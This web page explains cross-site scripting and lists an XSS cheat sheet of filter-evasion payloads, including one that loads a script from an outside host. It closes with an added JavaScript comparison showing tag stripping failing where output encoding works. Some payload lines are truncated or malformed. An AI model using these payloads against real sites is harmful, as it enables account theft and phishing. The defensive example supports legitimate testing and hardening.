This vulnerability occurs due to poor application development. An attacker is able to inject malicious HTML code through the client's web browser.
Most XSS attacks rely on JavaScript and HTML to execute malicious code on the target website. Once an attacker is able to run his code with JavaScript on the site, that JavaScript is executed when a user comes to the site and clicks the malicious link. Mostly, people do XSS and show a pop-up with their name to advertise themselves.
XSS can be used for phishing, for stealing accounts, or for social engineering.
XSS Cheat Sheet:
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
'><script>alert(0)</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'ja asc
ipt:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
<IMG DYNSRC="javascript:alert('XSS')">
<img src=javascript:alert('XSS')>
<script language=JavaScript>alert('XSS')</script>
<body onunload=javascript:alert('XSS');>
<body onLoad='alert('XSS');'
[color=red' onmouseover='alert('xss')']mouse over[/color]
'/></a></><img src=1.gif onerror=alert(1)>
window.alert('Bonjour !');
<div style='x:expression((window.r==1)?'':eval('r=1;
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
'>><marquee><h1>XSS</h1></marquee>
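Several entries in the list above, such as the nested <scr<script>ipt> string, exist only to get past filters that delete "bad" tags, which is why output encoding is the reliable fix. The following is an added example, not code from the original page; naiveStrip, escapeHtml, hasActiveMarkup and audit are hypothetical helper names, and the sample strings are copied from the list.

```javascript
// Compare a tag-stripping blacklist with output encoding on strings from the list.

// Single-pass removal of <script> tags: the kind of filter the nested
// entry is written to defeat.
function naiveStrip(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Output encoding for HTML body and quoted-attribute contexts: the five
// significant characters become entities, so the browser renders text.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Rough check: does the string still contain something a browser would
// parse as the start of a tag?
function hasActiveMarkup(s) {
  return /<\s*\/?\s*[a-z]/i.test(s);
}

// Sample inputs copied from the cheat sheet above.
const samples = [
  "<script>alert(1);</script>",
  "<scr<script>ipt>alert('XSS');</scr</script>ipt>",
  "<img src=foo.png onerror=alert(/xssed/) />",
  "'><script>alert(0)</script>",
];

// Run both defences over every sample and report what survives.
function audit(list) {
  return list.map((payload) => {
    const stripped = naiveStrip(payload);
    const escaped = escapeHtml(payload);
    return {
      payload,
      stripped,
      strippedStillActive: hasActiveMarkup(stripped),
      escaped,
      escapedStillActive: hasActiveMarkup(escaped),
    };
  });
}

for (const r of audit(samples)) {
  console.log(r.strippedStillActive ? "strip FAILS" : "strip ok   ", "|", r.escaped);
}
```

Stripping reassembles the nested entry into a working script tag and never touches the onerror handler, while encoding neutralises all four. Encoding alone does not cover the javascript: entries in the list when user input is written into a src or href attribute; those need a URL scheme allow-list.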